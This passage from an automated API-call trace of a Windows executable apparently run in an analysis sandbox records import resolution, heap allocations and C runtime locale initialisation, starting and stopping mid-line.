lpProcName="DeviceIoControl") returned 0x76d4322f [0239.772] GetProcAddress (hModule=0x76d30000, lpProcName="DuplicateHandle") returned 0x76d41886 [0239.772] GetProcAddress (hModule=0x76d30000, lpProcName="FormatMessageW") returned 0x76d44620 [0239.772] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventW") returned 0x76d4183e [0239.772] GetProcAddress (hModule=0x76d30000, lpProcName="CreateProcessW") returned 0x76d4103d [0239.772] GetProcAddress (hModule=0x76d30000, lpProcName="ExpandEnvironmentStringsW") returned 0x76d44173 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="GetDriveTypeW") returned 0x76d4418b [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemDirectoryW") returned 0x76d45063 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteFileW") returned 0x76d489b3 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadErrorMode") returned 0x76dbaf42 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="HeapSize") returned 0x77c73002 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringW") returned 0x76d417b9 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="GetStringTypeW") returned 0x76d41946 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateThread") returned 0x76d47a2f [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="OpenProcess") returned 0x76d41986 [0239.773] GetProcAddress (hModule=0x76d30000, lpProcName="GetVersion") returned 0x76d44467 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="CreateFileW") returned 0x76d43f5c [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="FindResourceW") returned 0x76d45971 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="SizeofResource") returned 0x76d45ac9 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="CloseHandle") returned 0x76d41410 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="SetLastError") returned 0x76d411a9 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="LoadResource") returned 0x76d4594c [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="GetLastError") returned 0x76d411c0 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcess") returned 0x76d41809 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="LockResource") returned 0x76d45959 [0239.774] GetProcAddress (hModule=0x76d30000, lpProcName="GetCommandLineW") returned 0x76d45223 [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleW") returned 0x76d434b0 [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryW") returned 0x76d4492b [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="GetStdHandle") returned 0x76d451b3 [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="LocalFree") returned 0x76d42d3c [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="LocalAlloc") returned 0x76d4168c [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcAddress") returned 0x76d41222 [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleFileNameW") returned 0x76d44950 [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleScreenBufferInfo") returned 0x76d6bafd [0239.775] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileType") returned 0x76d43531 [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="OutputDebugStringW") returned 0x76d6d1d4 [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleW") returned 0x76de739a [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="WriteConsoleW") returned 0x76d67aca [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="SetFilePointerEx") returned 0x76d5c807 [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="EnterCriticalSection") returned 0x77c622b0 [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="LeaveCriticalSection") returned 0x77c62270 [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="SetStdHandle") returned 0x76dc454f [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="HeapAlloc") returned 0x77c6e026 [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="EncodePointer") returned 0x77c80fcb [0239.776] GetProcAddress (hModule=0x76d30000, lpProcName="DecodePointer") returned 0x77c79d35 [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="ExitProcess") returned 0x76d47a10 [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="GetModuleHandleExW") returned 0x76d44a6f [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="MultiByteToWideChar") returned 0x76d4192e [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="WideCharToMultiByte") returned 0x76d4170d [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="HeapFree") returned 0x76d414c9 [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleMode") returned 0x76d41328 [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="ReadConsoleInputA") returned 0x76de6f53 [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="SetConsoleMode") returned 0x76d5a77d [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThread") returned 0x76d434d5 [0239.777] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentThreadId") returned 0x76d41450 [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="ExitThread") returned 0x77c9d598 [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="LoadLibraryExW") returned 0x76d4495d [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="DeleteCriticalSection") returned 0x77c745f5 [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="FlushFileBuffers") returned 0x76d4469b [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="WriteFile") returned 0x76d41282 [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="GetConsoleCP") returned 0x76de7bff [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="IsDebuggerPresent") returned 0x76d44a5d [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="IsProcessorFeaturePresent") returned 0x76d45235 [0239.778] GetProcAddress (hModule=0x76d30000, lpProcName="ReadFile") returned 0x76d43ed3 [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="GetStartupInfoW") returned 0x76d44d40 [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="UnhandledExceptionFilter") returned 0x76d6772f [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="SetUnhandledExceptionFilter") returned 0x76d487c9 [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionAndSpinCount") returned 0x76d41916 [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="Sleep") returned 0x76d410ff [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="TerminateProcess") returned 0x76d5d802 [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="TlsAlloc") returned 0x76d449ad [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="TlsGetValue") returned 0x76d411e0 [0239.779] GetProcAddress (hModule=0x76d30000, lpProcName="TlsSetValue") returned 0x76d414fb [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="TlsFree") returned 0x76d43587 [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidCodePage") returned 0x76d44493 [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="GetACP") returned 0x76d4179c [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="GetOEMCP") returned 0x76d6d1a1 [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="GetCPInfo") returned 0x76d45189 [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="GetProcessHeap") returned 0x76d414e9 [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="RtlUnwind") returned 0x76d6d1c3 [0239.780] GetProcAddress (hModule=0x76d30000, lpProcName="QueryPerformanceCounter") returned 0x76d41725 [0239.781] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessId") returned 0x76d411f8 [0239.781] GetProcAddress (hModule=0x76d30000, lpProcName="GetSystemTimeAsFileTime") returned 0x76d43509 [0239.781] GetProcAddress (hModule=0x76d30000, lpProcName="GetEnvironmentStringsW") returned 0x76d451e3 [0239.781] GetProcAddress (hModule=0x76d30000, lpProcName="FreeEnvironmentStringsW") returned 0x76d451cb [0239.781] GetProcAddress (hModule=0x76d30000, lpProcName="HeapReAlloc") returned 0x77c81f6e [0239.781] GetProcAddress (hModule=0x76d30000, lpProcName="SetEndOfFile") returned 0x76d5ce2e [0239.781] LoadLibraryA (lpLibFileName="ADVAPI32.dll") returned 0x77710000 [0239.781] GetProcAddress (hModule=0x77710000, lpProcName="GetTokenInformation") returned 0x7772431c [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="RegDeleteKeyW") returned 0x77721272 [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="LookupPrivilegeValueW") returned 0x777241b3 [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="AdjustTokenPrivileges") returned 0x7772418e [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="OpenProcessToken") returned 0x77724304 [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="RegSetValueExW") returned 0x777214d6 [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="RegQueryValueExW") returned 0x777246ad [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyExW") returned 0x7772468d [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="RegOpenKeyW") returned 0x77722459 [0239.782] GetProcAddress (hModule=0x77710000, lpProcName="RegCreateKeyW") returned 0x77721514 [0239.783] GetProcAddress (hModule=0x77710000, lpProcName="RegCloseKey") returned 0x7772469d [0239.783] GetProcAddress (hModule=0x77710000, lpProcName="LookupAccountSidW") returned 0x77724874 [0239.783] LoadLibraryA (lpLibFileName="COMDLG32.dll") returned 0x77270000 [0239.783] GetProcAddress (hModule=0x77270000, lpProcName="PrintDlgW") returned 0x772733a3 [0239.783] LoadLibraryA (lpLibFileName="GDI32.dll") returned 0x770a0000 [0239.783] GetProcAddress (hModule=0x770a0000, lpProcName="StartPage") returned 0x770e401a [0239.783] GetProcAddress (hModule=0x770a0000, lpProcName="EndDoc") returned 0x770e3f29 [0239.783] GetProcAddress (hModule=0x770a0000, lpProcName="StartDocW") returned 0x770e4c51 [0239.783] GetProcAddress (hModule=0x770a0000, lpProcName="SetMapMode") returned 0x770bb02f [0239.784] GetProcAddress (hModule=0x770a0000, lpProcName="GetDeviceCaps") returned 0x770b4de0 [0239.784] GetProcAddress (hModule=0x770a0000, lpProcName="EndPage") returned 0x770c6bde [0239.784] LoadLibraryA (lpLibFileName="USER32.dll") returned 0x77130000 [0239.784] GetProcAddress (hModule=0x77130000, lpProcName="SendMessageW") returned 0x77149679 [0239.784] GetProcAddress (hModule=0x77130000, lpProcName="DialogBoxIndirectParamW") returned 0x7716cbf3 [0239.784] GetProcAddress (hModule=0x77130000, lpProcName="EndDialog") returned 0x7716b99c [0239.784] GetProcAddress (hModule=0x77130000, lpProcName="LoadCursorW") returned 0x771488f7 [0239.784] GetProcAddress (hModule=0x77130000, lpProcName="InflateRect") returned 0x77153309 [0239.784] GetProcAddress (hModule=0x77130000, lpProcName="GetSysColorBrush") returned 0x771535a4 [0239.784] GetProcAddress (hModule=0x77130000, lpProcName="SetCursor") returned 0x771541f6 [0239.785] GetProcAddress (hModule=0x77130000, lpProcName="SetWindowTextW") returned 0x771520ec [0239.785] GetProcAddress (hModule=0x77130000, lpProcName="GetDlgItem") returned 0x7716f1ba [0239.785] LoadLibraryA (lpLibFileName="VERSION.dll") returned 0x75440000 [0239.785] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoW") returned 0x754419f4 [0239.785] GetProcAddress (hModule=0x75440000, lpProcName="VerQueryValueW") returned 0x75441b51 [0239.785] GetProcAddress (hModule=0x75440000, lpProcName="GetFileVersionInfoSizeW") returned 0x754419d9 [0239.785] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x4, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x2) returned 1 [0239.786] VirtualProtect (in: lpAddress=0x400000, dwSize=0x1000, flNewProtect=0x2, lpflOldProtect=0x18ff68 | out: lpflOldProtect=0x18ff68*=0x4) returned 1 [0239.786] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x18ff78 | out: lpSystemTimeAsFileTime=0x18ff78*(dwLowDateTime=0x44cba180, dwHighDateTime=0x1d68287)) [0239.786] GetCurrentThreadId () returned 0x90c [0239.787] GetCurrentProcessId () returned 0x6f4 [0239.787] QueryPerformanceCounter (in: lpPerformanceCount=0x18ff70 | out: lpPerformanceCount=0x18ff70*=36012551512) returned 1 [0239.787] GetProcessHeap () returned 0x2b0000 [0239.787] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76d30000 [0239.787] GetProcAddress (hModule=0x76d30000, lpProcName="FlsAlloc") returned 0x76d44f2b [0239.787] GetProcAddress (hModule=0x76d30000, lpProcName="FlsFree") returned 0x76d4359f [0239.787] GetProcAddress (hModule=0x76d30000, lpProcName="FlsGetValue") returned 0x76d41252 [0239.787] GetProcAddress (hModule=0x76d30000, lpProcName="FlsSetValue") returned 0x76d44208 [0239.787] GetProcAddress (hModule=0x76d30000, lpProcName="InitializeCriticalSectionEx") returned 0x76d44d28 [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="CreateEventExW") returned 0x76dc410b [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSemaphoreExW") returned 0x76dc4195 [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadStackGuarantee") returned 0x76d4d31f [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolTimer") returned 0x76d5ee7e [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolTimer") returned 0x77c8441c [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="WaitForThreadpoolTimerCallbacks") returned 0x77cac50e [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolTimer") returned 0x77cac381 [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="CreateThreadpoolWait") returned 0x76d5f088 [0239.788] GetProcAddress (hModule=0x76d30000, lpProcName="SetThreadpoolWait") returned 0x77c905d7 [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="CloseThreadpoolWait") returned 0x77caca24 [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="FlushProcessWriteBuffers") returned 0x77c60b8c [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="FreeLibraryWhenCallbackReturns") returned 0x77d1fde8 [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentProcessorNumber") returned 0x77cb1e1d [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="GetLogicalProcessorInformation") returned 0x76dc4761 [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="CreateSymbolicLinkW") returned 0x76dbcd11 [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="SetDefaultDllDirectories") returned 0x0 [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="EnumSystemLocalesEx") returned 0x76dc424f [0239.789] GetProcAddress (hModule=0x76d30000, lpProcName="CompareStringEx") returned 0x76dc46b1 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="GetDateFormatEx") returned 0x76dd6676 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="GetLocaleInfoEx") returned 0x76dc4751 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="GetTimeFormatEx") returned 0x76dd65f1 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="GetUserDefaultLocaleName") returned 0x76dc47c1 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="IsValidLocaleName") returned 0x76dc47e1 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="LCMapStringEx") returned 0x76dc47f1 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="GetCurrentPackageId") returned 0x0 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="GetTickCount64") returned 0x76d5eee0 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="GetFileInformationByHandleExW") returned 0x0 [0239.790] GetProcAddress (hModule=0x76d30000, lpProcName="SetFileInformationByHandleW") returned 0x0 [0239.791] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3bc) returned 0x2c70a0 [0239.792] GetCurrentThreadId () returned 0x90c [0239.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x18) returned 0x2c7468 [0239.792] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2c7488 [0239.792] GetStartupInfoW (in: lpStartupInfo=0x18fed8 | out: lpStartupInfo=0x18fed8*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x40ad42, hStdOutput=0x279ec113, hStdError=0x0)) [0239.792] GetStdHandle (nStdHandle=0xfffffff6) returned 0x3 [0239.792] GetFileType (hFile=0x3) returned 0x2 [0239.793] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0239.793] GetFileType (hFile=0x7) returned 0x2 [0239.794] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0239.794] GetFileType (hFile=0xb) returned 0x2 [0239.794] GetCommandLineW () returned="tdq963ii.exe -accepteula -c Run -y -p extract -nobanner" [0239.794] GetEnvironmentStringsW () returned 0x2c7c90* [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0xb84) returned 0x2c8820 [0239.795] FreeEnvironmentStringsW (penv=0x2c7c90) returned 1 [0239.795] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x426ea0, nSize=0x104 | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\tdq963ii.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\tdq963ii.exe")) returned 0x32 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x94) returned 0x2c7c90 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xa0) returned 0x2c7d30 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3e) returned 0x2c4dd0 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2c7dd8 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6e) returned 0x2c7e50 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x78) returned 0x2bf900 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x62) returned 0x2c7ec8 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c7f38 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c7f70 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x28) returned 0x2c7fc0 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x28) returned 0x2c7ff0 [0239.795] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1a) returned 0x2c6a70 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x4a) returned 0x2c8020 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x72) returned 0x2bf980 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c8078 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c80b0 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1c) returned 0x2c6a98 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0xd2) returned 0x2c80e8 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x7c) returned 0x2c81c8 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2c8250 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3a) returned 0x2c4e18 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x90) returned 0x2c8290 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c8328 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c8358 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x36) returned 0x2c8390 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x48) returned 0x2c83d0 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x52) returned 0x2c8420 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2c4e60 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x18) returned 0x2c8480 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x82) returned 0x2c84a0 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2e) returned 0x2c8530 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1e) returned 0x2c6ac0 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2c) returned 0x2c8568 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x54) returned 0x2c85a0 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x52) returned 0x2c8600 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x2a) returned 0x2c8660 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x3c) returned 0x2c4ea8 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x54) returned 0x2c8698 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x24) returned 0x2c86f8 [0239.796] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x30) returned 0x2c8728 [0239.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x8c) returned 0x2c8760 [0239.797] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2c8820 | out: hHeap=0x2b0000) returned 1 [0239.797] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x800) returned 0x2c87f8 [0239.797] GetLastError () returned 0x0 [0239.797] SetLastError (dwErrCode=0x0) [0239.797] GetLastError () returned 0x0 [0239.797] SetLastError (dwErrCode=0x0) [0239.798] GetLastError () returned 0x0 [0239.798] SetLastError (dwErrCode=0x0) [0239.798] GetACP () returned 0x4e4 [0239.798] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x220) returned 0x2c9000 [0239.798] GetLastError () returned 0x0 [0239.798] SetLastError (dwErrCode=0x0) [0239.798] IsValidCodePage (CodePage=0x4e4) returned 1 [0239.798] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18fecc | out: lpCPInfo=0x18fecc) returned 1 [0239.798] GetCPInfo (in: CodePage=0x4e4, lpCPInfo=0x18f994 | out: lpCPInfo=0x18f994) returned 1 [0239.798] GetLastError () returned 0x0 [0239.798] SetLastError (dwErrCode=0x0) [0239.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f718, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0239.798] GetStringTypeW (in: dwInfoType=0x1, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpCharType=0x18f9a8 | out: lpCharType=0x18f9a8) returned 1 [0239.798] GetLastError () returned 0x0 [0239.798] SetLastError (dwErrCode=0x0) [0239.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0239.798] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fda8, cbMultiByte=256, lpWideCharStr=0x18f6e8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ") returned 256 [0239.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x0, cchDest=0, lpVersionInformation=0x0, lpReserved=0x0, lParam=0x0 | out: lpDestStr=0x0) returned 256 [0239.798] LCMapStringEx (in: lpLocaleName=0x0, dwMapFlags=0x100, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿĀ", cchSrc=256, lpDestStr=0x18f4d8, cchDest=256, 